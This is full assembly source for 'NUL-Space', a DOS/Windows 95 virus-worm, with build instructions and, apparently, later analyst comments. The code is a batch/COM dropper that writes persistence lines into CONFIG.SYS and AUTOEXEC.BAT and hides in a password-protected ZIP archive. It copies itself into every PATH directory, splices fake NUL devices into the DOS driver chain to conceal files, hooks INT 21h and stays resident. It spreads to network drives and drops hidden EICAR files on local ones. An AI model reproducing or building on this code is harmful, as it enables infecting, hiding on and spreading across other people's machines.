comment *
This virii/worm hides in NUL-Space and Cypher Text (see my "Playing Hide and
Seek" article). Once active this virus cannot be detected by normal means.
It hides in a file that has the same name as a NUL device driver. It also
hides in a ZIP file that is password protected so AV programs won't detect it.
It has an unusual payload: it creates those stupid EICAR test files all over
the PC. It is network aware and only spreads by network drives. It works
with Windows 95.
tasm nulspace /m2
tlink nulspace /t
copy nulspace.com c:\winstart.bat
*
.286 ;186+ instructions (pusha/popa) are used by the resident handler
qseg segment byte public 'CODE'
assume cs:qseg,es:qseg,ss:nothing,ds:qseg
;counter lives at offset 0FEh, i.e. inside the PSP (last word of the
;command-tail area) rather than in the .COM image: it persists as resident
;state but is never part of the file that resident_isr21 writes out
;(that write starts at 100h). Its starting value is whatever the command
;tail held at load time; resident_isr21 bumps it on every INT 21h.
org 00feh
counter label word
org 0100h ;the .COM image starts here; the bytes that follow double as batch text
start:
;-----------------------------------------------------------------------
; com_install - the dropper. Everything from start up to the 1Ah at the
; end is valid both as a batch file (it is installed as C:\WINSTART.BAT,
; see the build notes above) and as 8086 code:
;   as a batch file: each line beginning with ":" is a label, so the jump
;     opcodes that follow every ":" are merely label text; the ECHO/PKZIP/
;     FOR lines between them are the commands that actually run;
;   as a .COM file: execution enters at "::" and each complementary
;     conditional-jump pair acts as an unconditional jump over the text to
;     the next pair, finally landing in go_mem_res.
; Batch-mode side effects (all on drive C:): appends an INSTALLHIGH line to
; CONFIG.SYS, appends CTTY NUL / PKUNZIP / SET Q=Q / CTTY CON lines to
; AUTOEXEC.BAT, archives this file with PKZIP under a 3-character password
; as a random C:\???.??? name, and copies itself into every %PATH%
; directory and C:\. Those lines and files are the persistence artifacts
; an analyst should look for.
; Note: this block is also what gets written to other drives
; (resident_isr21 writes offsets 100h..previous_hook), so any byte change
; here changes the replicated file.
;-----------------------------------------------------------------------
com_install proc near ;batch file starting
db "::" ;as a com file it jumps past
        ;(batch: "::" opens a comment line that swallows the jump bytes
        ;below; code: 3Ah 3Ah decodes as a cmp that reads one byte and
        ;only writes flags)
js jmp_next_part ;the batch code
jns jmp_next_part ;js+jns together = unconditional jump
db 0dh,0ah
db "@CTTY NUL",0dh,0ah ;output off and change config
                       ;(console redirected to NUL so nothing is shown)
db "ECHO INSTALLHIGH=C:\WINSTART.BAT>>C:\CONFIG.SYS",0dh,0ah
db "IF %Q%==Q GOTO " ;used for reinfection
                     ;Q is set by the AUTOEXEC line appended below, so on
                     ;later runs this skips straight to the label at
                     ;jmp_next_part3 (the FOR/spread line)
js $(go_mem_res-jmp_next_part3) ;these two encodings are meant to yield
jns $(go_mem_res-jmp_next_part3-02h) ;the same bytes as the js/jns at
                                     ;jmp_next_part3 so the GOTO text
                                     ;matches that label - confirm in the
                                     ;assembled listing
db 0dh,0ah
db ":"
jmp_next_part: jo jmp_next_part1 ;more stupid jumps
jno jmp_next_part1 ;jo+jno = unconditional
db 0dh,0ah
db "PKZIP -3 -- -+ -~ -S" ;compress ourselves
password1 db "XXX C:\" ;use password
                       ;the XXX / QUE / CAB bytes here and below are
                       ;overwritten with random characters by
                       ;create_random3 before each replication
random_file1 db "QUE." ;random file name
random_ext1 db "CAB C:\WINSTART.BAT",0dh,0ah
db "ECHO @ECHO OFF>>C:\AUTOEXEC.BAT",0dh,0ah
db ":" ;prepare autoexec for reinfect
jmp_next_part1: ja jmp_next_part2 ;more jumps
jb jmp_next_part2 ;NOTE(review): ja (CF=0 and ZF=0) and jb (CF=1) are not
                  ;a complementary pair - with ZF=1,CF=0 neither is taken
                  ;and execution would run into the text below. The flags
                  ;here are still those left by the cmp at the top of the
                  ;block (the jumps do not touch them).
db 0dh,0ah
db "ECHO CTTY NUL>>C:\AUTOEXEC.BAT",0dh,0ah
db "ECHO PKUNZIP -) -3 -O -S" ;appended to AUTOEXEC: re-extracts the
                              ;archive over C:\WINSTART.BAT on every boot
password2 db "XXX C:\" ;reinfect again
random_file2 db "QUE."
random_ext2 db "CAB>>C:\AUTOEXEC.BAT",0dh,0ah
db ":"
jmp_next_part2: jpe jmp_next_part3 ;more jumps
jpo jmp_next_part3 ;jpe+jpo = unconditional
db 0dh,0ah ;set q=q for jmp in winstart
db "ECHO SET Q=Q>>C:\AUTOEXEC.BAT",0dh,0ah
db "ECHO CTTY CON>>C:\AUTOEXEC.BAT",0dh,0ah
db ":"
jmp_next_part3: js go_mem_res ;more jumps
                              ;batch: this label is the GOTO target above
jns go_mem_res ;js+jns = unconditional; as code this leaves com_install
db 0dh,0ah ;spread it around
db "FOR %%Q IN (%PATH% C:\) DO %COMSPEC% /F/CCOPY/B %0+%0.BAT %%Q",0dh,0ah
               ;copies this batch file into every directory on %PATH% and
               ;into C:\ (%0 and %0.BAT presumably cover both spellings of
               ;the script name; /F presumably suppresses critical-error
               ;prompts - verify against the COMMAND.COM version)
db "CTTY CON" ;output on
db 1ah ;ctrl-z
       ;end-of-file for the batch interpreter: the binary that follows is
       ;never parsed as batch text
com_install endp
;-----------------------------------------------------------------------
; go_mem_res - .COM-mode installer, reached from the jump chain above.
; 1. frees its own environment block (segment at PSP:2Ch);
; 2. links three fake NUL-type character devices (SCANDSKW, EICAR,
;    WINSTART) into the DOS device driver chain via the List of Lists;
; 3. moves the current INT 21h vector to INT 18h, then points INT 21h at
;    resident_isr21;
; 4. terminates-and-stays-resident.
; Forensic artifacts this leaves: three extra NUL-attribute device headers
; in the driver chain, INT 18h pointing into DOS, INT 21h pointing into a
; small resident block whose PSP is this program.
; Clobbers: ax, bx, cx, di, si, ds, es (does not return).
;-----------------------------------------------------------------------
go_mem_res proc near ;clear environment space
mov es,word ptr ds:[2ch] ;PSP:2Ch = segment of our environment block
mov ah,49h ;INT 21h/49h: free memory block (es)
int 21h ;create NUL-Space devices
mov di,offset scandisk_device
mov cx,0003h ;3 of them, first is scandskw
next_device: mov ah,52h ;get list of lists
int 21h ;es:bx -> List of Lists
cld
lds si,dword ptr es:[bx+22h];get NUL device chain
                            ;LoL+22h is the NUL device header; its first
                            ;dword is the link to the next driver, so
                            ;ds:si -> header of the driver after NUL
push cs
pop es
mov ax,di ;point to new device to add
movsw ;put it in chain
movsw ;far pointer
      ;copies that driver's link into our header's link field (the dd -1
      ;placeholder): our device inherits its successor
mov word ptr ds:[si-02h],cs ;point to new device
mov word ptr ds:[si-04h],ax ;...and that driver's link now points at us,
                            ;so the new header is spliced in right after it
add di,offset eicar_device-scandisk_device-04h ;di already advanced 4 by
                                                ;the movsw; step to the
                                                ;next header
loop next_device ;do eicar and winstart device
push cs ;hook interrupt 21
pop ds
mov ax,3521h ;get INT 21h vector -> es:bx
int 21h
mov word ptr ds:[previous_hook],bx ;stored behind the far-jmp opcode in
mov word ptr ds:[previous_hook+02h],es ;far_jmp, used for chaining
mov ax,2518h ;save old interrupt 21 as 18
             ;the resident handler issues INT 18h for its own DOS calls so
             ;it never re-enters its INT 21h hook
mov dx,bx
push es
pop ds ;ds:dx = original INT 21h handler
int 21h
push cs
pop ds
mov dx,offset resident_isr21
mov al,21h ;ah (still 25h) = set vector: INT 21h -> resident_isr21
int 21h
mov ah,31h ;go memory resident
mov dx,((tail-com_install+0110h) SHR 4) ;paragraphs to keep: PSP (100h) +
                                        ;image up to tail, rounded up
int 21h
go_mem_res endp
;-----------------------------------------------------------------------
; interrupt_24 - critical-error (INT 24h) handler installed while the
; resident code touches drives. Returns AL=3 ("fail the call"), so an
; unready or missing drive just yields an error return instead of the
; Abort/Retry/Fail prompt that would reveal the activity.
; return_far is reused as both the strategy and the interrupt entry of the
; fake device headers below: a far return that does nothing.
;-----------------------------------------------------------------------
interrupt_24 proc near
mov al,03h ;fiddly little critical error
           ;AL=3: fail the DOS call that raised the error
iret ;handler
return_far: retf ;retf for NUL device routines
interrupt_24 endp
;-----------------------------------------------------------------------
; Resident data. The three device headers below use the standard DOS
; layout: dd link (filled in by go_mem_res), dw attributes, dw strategy
; entry, dw interrupt entry, 8-byte name. DOS resolves a file name that
; equals a character-device name to the device, which is the "NUL-Space"
; trick described in the header comment.
;-----------------------------------------------------------------------
vname db " NUL-Space " ;marker string; not referenced by the visible code
scandisk_device dd -1 ;our 3 new NUL-Space devices
                      ;link field, overwritten at install
dw 8004h ;nul character attributes
         ;bit 15 = character device, bit 2 = NUL device
dw return_far ;do nothing routines
dw return_far
db "SCANDSKW" ;stop scandskw in windows 95
              ;(presumably so SCANDSKW.EXE resolves to this device)
eicar_device dd -1
dw 8004h
dw return_far
dw return_far
eicar_dev_name db "EICAR " ;protect those stupid eicar
                           ;only 6 bytes: the name's last two bytes are the
                           ;first two bytes of winstart_device's link field.
                           ;Bytes 0..4 appear to be re-randomised together
                           ;with eicar_file by resident_isr21
winstart_device dd -1 ;files while we infect
dw 8004h
dw return_far
dw return_far
win_dev_name db "WINSTART" ;finally protect ourselves
                           ;hides C:\WINSTART.BAT; the first byte is XORed
                           ;while the worm itself creates that file
winstart_file db "C:\WINSTART.BAT",00h ;file name to replicate
                                       ;drive letter patched per target
eicar_drive db "C:" ;drive letter patched per target; eicar_drive, eicar_file
eicar_file db "EICAR." ;and eicar_ext form one ASCIIZ path "X:?????.???"
eicar_ext db "QUE",00h ;3 random chars, see eicar_dropper
drive_number dw 27 ;last drive tried (1=A:); 27 makes the next pick start at C:
;-----------------------------------------------------------------------
; eicar - not code that runs: the bytes assembled here are the 68-byte
; EICAR anti-virus test string followed by CR/LF. Each mnemonic is simply
; one or more characters of that string (pop ax = 'X', xor ax,214Fh =
; "5O!", push ax = 'P', ... jge terminate = "}$", whose displacement 24h
; skips the 36-byte text). The payload copies eicar..eicar_length into
; files (see eicar_dropper in resident_isr21); the string itself is the
; harmless industry test pattern, which is exactly why scanners flag it.
;-----------------------------------------------------------------------
eicar proc near ;stupid EICAR file
pop ax ;'X'
xor ax,214Fh ;"5O!"
push ax ;'P'
and ax,4140h ;"%@A"
push ax ;'P'
pop bx ;'['
xor al,5Ch ;"4\"
push ax ;'P'
pop dx ;'Z'
pop ax ;'X'
xor ax,2834h ;"54("
push ax ;'P'
pop si ;'^'
sub [bx],si ;")7"
inc bx ;'C'
inc bx ;'C'
sub [bx],si ;")7"
jge terminate ;"}$": 7Dh then displacement 24h = 36 = length of the text below
eicar_text db 'EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$'
terminate: dec ax ;'H'
sub cx,[bx+si+2Ah] ;"+H*"
db 0dh,0ah ;the dropped file ends with CR LF; 70 bytes in total
eicar_length label byte ;end marker: file length = eicar_length-eicar
eicar endp
;-----------------------------------------------------------------------
; create_random3 - writes the same 3 pseudo-random characters to es:[di]
; and es:[si] (used for the archive name, password, extension and the
; matching fake-device name). Entropy source is the 8254 timer: writing 0
; to port 43h latches counter 0, port 40h then returns its low and high
; byte; the low byte also drives a busy-wait so consecutive reads differ.
; Character set: 'A'..'Z' plus '1'..'6' (the five values above 'Z' are
; shifted down by 42), i.e. 32 symbols per position.
; In:  es:di, es:si -> 3-byte targets (callers set es=cs first)
; Out: di and si advanced by 3; cx=0; ax clobbered; flags changed.
; NOTE(review): three symbols from a 32-value set give the "password" at
; most 15 bits, so the archive is trivially recoverable for analysis.
;-----------------------------------------------------------------------
create_random3 proc near
mov cx,0003h ;3 byte random file
setname: xor ax,ax ;random name at es:di & es:si (both writes go through es)
out 43h,al ;latch PIT counter 0
push cx
in al,40h ;low byte of the latched count
mov cx,ax ;ah=0, so cx = that byte
around: loop around ;psuedo random delay
pop cx
and al,1fh ;32 letters possible
add al,'A'
cmp al,'Z'
jbe nameit
sub al,42 ;if above Z then make it 1-6
nameit: stosb ;save random name
mov byte ptr es:[si],al ;second copy (e.g. the reinfection line / device name)
inc si
incloop: in al,40h ;get the high byte
                   ;(completes the latched read; value is discarded)
loop setname
retn
create_random3 endp
;-----------------------------------------------------------------------
; resident_isr21 - the INT 21h hook. Counts calls in ds:[counter] (PSP:FEh)
; and on every 65536th call performs one replication step against one
; drive, then falls through into far_jmp to the saved original handler.
; All DOS calls made from inside are issued via INT 18h, which go_mem_res
; pointed at the original INT 21h, so the hook is not re-entered.
; Per activation: installs interrupt_24, picks the next drive letter
; (cycling C:..Z:, IOCTL 4409h to probe it), then
;   - network drive: randomises names/password, creates X:\WINSTART.BAT
;                    (only if absent) from the image at 100h..previous_hook;
;   - local drive:   creates X:?????.??? holding the EICAR string with
;                    read-only+hidden+system attributes.
; Either file gets the fixed date 229Fh. Segment registers and flags are
; restored before chaining; general registers are preserved via pusha.
;-----------------------------------------------------------------------
resident_isr21 proc near
pusha
push ds
push es
pushf
push cs
pop ds
cld
inc word ptr ds:[counter] ;only infect every 65536 times
jz infect_now ;into interrupt 21h
jmp not_infect_now
infect_now: mov ax,3524h ;set critical error handler
int 18h ;get current INT 24h -> es:bx
push es
pusha ;saves bx (old INT 24h offset) and ax
mov dx,offset interrupt_24 ;our handler
mov ah,25h ;ds=cs: INT 24h -> interrupt_24 (fail instead of prompting)
int 18h
push cs
pop es ;get drive to infect
       ;es=cs is what create_random3 below relies on
next_drive: mov bx,word ptr ds:[drive_number]
cmp bx,27 ;is it past drive Z: ?
jb save_letter
mov bl,02h ;wrap: the inc below gives 3 = C:
save_letter: inc bx ;inc and save for next time
mov word ptr ds:[drive_number],bx
check_next: mov ax,4409h ;see if network or local drive
int 18h ;IOCTL: bl = drive (1=A:), returns dx = device attributes
jc next_drive ;if neither get next drive
xchg ax,bx ;al = drive number
add al,"@" ;save drive letter
mov byte ptr ds:winstart_file,al ;patch "X:\WINSTART.BAT"
mov byte ptr ds:eicar_drive,al ;patch "X:" of the EICAR path
test dh,10h ;test for network
            ;dx bit 12 = remote drive
jz eicar_dropper ;if local then drop EICARs
;--- network drive: replicate the worm as X:\WINSTART.BAT --------------
mov di,offset password1 ;create new cypher text file
mov si,offset password2 ;to be made from winstart
call create_random3 ;same 3-char password into both PKZIP/PKUNZIP lines
mov di,offset random_file1 ;random file name
mov si,offset random_file2
call create_random3
cmpsb ;skips the "." in both names
call create_random3 ;and random extension
mov di,offset eicar_file ;random file name
mov si,offset eicar_dev_name
pusha
call create_random3 ;randomise bytes 0..2 of eicar_file and the device name
popa ;di/si back to the start of both
cmpsw ;skip 2 bytes
call create_random3 ;and more random name
                    ;...bytes 2..4: 5 random chars in total, and the fake
                    ;device name keeps tracking the EICAR file name
mov dx,offset winstart_file ;create worm
mov di,offset win_dev_name ;disable nul-space driver
mov ah,5bh ;create new file
xor byte ptr ds:[di],ah ;corrupt 'W' so "WINSTART" no longer matches the
                        ;device and the create reaches the file system
xor cx,cx ;normal attributes
int 18h ;INT 21h/5Bh: create, CF set if the file already exists
mov byte ptr ds:[di],"W" ;set nul-space driver back
jc unable_infect ;already present (or error): nothing to do
mov dx,0100h ;point to start of winstart
mov cx,offset previous_hook-start ;image size: everything up to the
                                  ;stored INT 21h address
jmp short write_file ;create file
;--- local drive: drop an EICAR test file in the root ------------------
eicar_dropper: mov di,offset eicar_ext ;create EICAR file
mov si,di ;random extension
call create_random3 ;both writes hit the same 3 bytes
mov di,offset eicar_dev_name
mov ah,5bh ;create new file
xor byte ptr ds:[di],ah ;disable nul-space driver
mov dx,offset eicar_drive ;point to file
mov cl,07h ;readonly, hidden and system
           ;ch is 0 here because create_random3 leaves cx=0
int 18h
mov byte ptr ds:[di],"E" ;enable nul-space again
                         ;(no CF check on this path: on failure the write
                         ;and close below run with the error code as handle)
mov dl,low(offset eicar) ;point to EICAR file
                         ;only dl is set: relies on eicar and eicar_drive
                         ;lying in the same 256-byte page
mov cl,low(offset eicar_length-eicar) ;70 bytes
write_file: mov bh,40h ;write EICAR or winstart file
xchg ax,bx ;ah=40h (write), bx=handle returned by the create
int 18h
mov ax,5701h ;set date
mov dx,229fh ;decodes to 1997-04-31 (day 31 is not a real April date);
             ;cx, the time field, is not set and still holds the byte
             ;count passed to the write
int 18h
mov ah,3eh ;close it
int 18h
unable_infect: popa ;done
pop es
mov dx,bx ;set critical error back
          ;NOTE(review): ax after popa is what pusha saved (apparently
          ;3524h, a get-vector call) and ds is still cs, so this does not
          ;look like a valid AX=2524h restore; INT 24h likely stays
          ;pointed at interrupt_24 until DOS resets it at program exit
int 18h
not_infect_now: popf
pop_it: pop es
pop_ds_and_all: pop ds
popa
resident_isr21 endp
;-----------------------------------------------------------------------
; far_jmp - tail of resident_isr21: 0EAh is the JMP FAR ptr16:16 opcode
; and the four bytes reserved at previous_hook (org $+4 below) receive the
; original INT 21h vector from go_mem_res, so the hook chains on.
; previous_hook is declared "double" (8 bytes) but only a dword is used
; and only 4 bytes are reserved for it.
;-----------------------------------------------------------------------
far_jmp proc near
db 0eah ;jmp far opcode; target follows immediately
previous_hook: label double ;previous interrupt 21
far_jmp endp
org $+04h ;reserve the 4-byte far target that go_mem_res stores at previous_hook
tail label byte ;end of the resident image; go_mem_res sizes the TSR from it
qseg ends
end start ;entry point = offset 100h = the "::" batch line